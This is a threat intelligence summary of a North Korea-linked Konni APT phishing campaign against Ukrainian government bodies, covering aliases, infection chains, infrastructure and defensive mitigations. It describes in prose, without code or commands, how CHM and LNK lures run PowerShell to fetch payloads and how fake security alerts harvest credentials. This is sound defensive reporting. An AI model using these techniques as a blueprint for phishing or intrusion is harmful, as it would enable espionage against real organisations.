Full Report
The North Korea-linked threat actor known as Konni APT has been attributed to a phishing campaign targeting government entities in Ukraine, indicating the threat actor's targeting beyond Russia. Enterprise security firm Proofpoint said the end goal of the campaign is to collect intelligence on the "trajectory of the Russian invasion." "The group's interest in Ukraine follows historical targeting
Analysis Summary
# Threat Actor: Konni APT
## Attribution & Identity
North Korea-linked threat actor.
**Known Aliases:** Opal Sleet, Osmium, TA406, Vedalia.
**Associated Groupings:** Assessed to be one of several actors comprising the activity tracked as Kimsuky, Thallium, and Konni Group (as of November 2021 analysis). Operational since at least 2014.
## Activity Summary
Konni APT has been actively engaged in cyber espionage, recently focusing on a phishing campaign targeting government entities in Ukraine. The stated end goal of this campaign is to collect intelligence on the "trajectory of the Russian invasion." This pivot follows historical targeting of Russian and South Korean government entities. The goal appears to be gathering strategic, political intelligence for North Korean leadership, rather than tactical battlefield information.
## Tactics, Techniques & Procedures
- **Initial Access:** Spear-phishing via emails impersonating a fictitious senior fellow at a non-existent think tank (Royal Institute of Strategic Studies).
- **Payload Delivery (Variant 1):** Delivering password-protected RAR archives hosted on MEGA cloud service.
- **Execution (Variant 1):** The RAR contains a CHM file displaying decoy content (related to Valeriy Zaluzhnyi); clicking the page executes an embedded PowerShell command to download a next-stage payload.
- **Reconnaissance:** Post-compromise scripts gather system information, encode it using Base64, and exfiltrate it to the actor's server.
- **Delivery (Variant 2):** Direct distribution of an HTML attachment; clicking a link inside downloads a ZIP archive containing a benign PDF and a Windows shortcut (LNK) file.
- **Execution (Variant 2):** The LNK file runs a Base64-encoded PowerShell command dropping a Javascript Encoded file ("Themes.jse") via a VBScript. The JSE malware contacts an attacker-controlled URL and executes the response via PowerShell (payload nature unknown).
- **Credential Harvesting:** Distributing fake Microsoft security alert messages via ProtonMail to Ukrainian government entities, urging users to click embedded links to "verify" suspicious sign-in activity (warning of US-based IPs).
- **Persistence/Automation (Mentioned in related Kimsuky/TA406 context):** Creating scheduled tasks for automatic execution.
## Targeting
- **Sectors:** Government entities.
- **Geography:** Ukraine (recent focus), Russia, South Korea, United States (historical targeting).
- **Victims:** Ukrainian government entities. Prior campaigns targeted entities involved in South Korean affairs/government.
## Tools & Infrastructure
- **Malware Families Used:** Konni RAT (aka UpDog), Themes.jse (Javascript Encoded file), RoKRAT (mentioned in relation to associated groups).
- **Infrastructure:**
- MEGA cloud service (for hosting initial archives).
- Attack-controlled servers (for C2 and payload delivery/exfiltration).
- ProtonMail (for credential harvesting phishing emails).
- Dropbox, Yandex, pCloud (mentioned as C2 infrastructure used by associated groups like APT37/Konni).
- Compromised domains previously used for Naver credential harvesting.
## Implications
Konni APT continues to demonstrate flexibility in its operations, pivoting focus to Ukraine while maintaining its core objective of strategic intelligence gathering for North Korean leadership. Their reliance on multi-stage infection chains incorporating LNK files, PowerShell, and legitimate cloud services/obfuscation techniques suggests an intent to evade traditional endpoint security measures. The addition of direct credential harvesting via fake security alerts showcases proactive efforts to gain access before deploying malware.
## Mitigations
- Enhanced vigilance against spear-phishing, especially emails impersonating think tanks or official security alerts.
- Scrutinize attachments, particularly password-protected archives and unusual file types like CHM, LNK, and JSE files originating from external sources.
- Implement application control to restrict the execution of PowerShell scripts, especially those launched indirectly from documents or shortcuts.
- Review network egress traffic for outbound connections to cloud storage providers outside standard business use cases.
- Deploy multi-factor authentication (MFA) across all government accounts to mitigate credential harvesting attempts.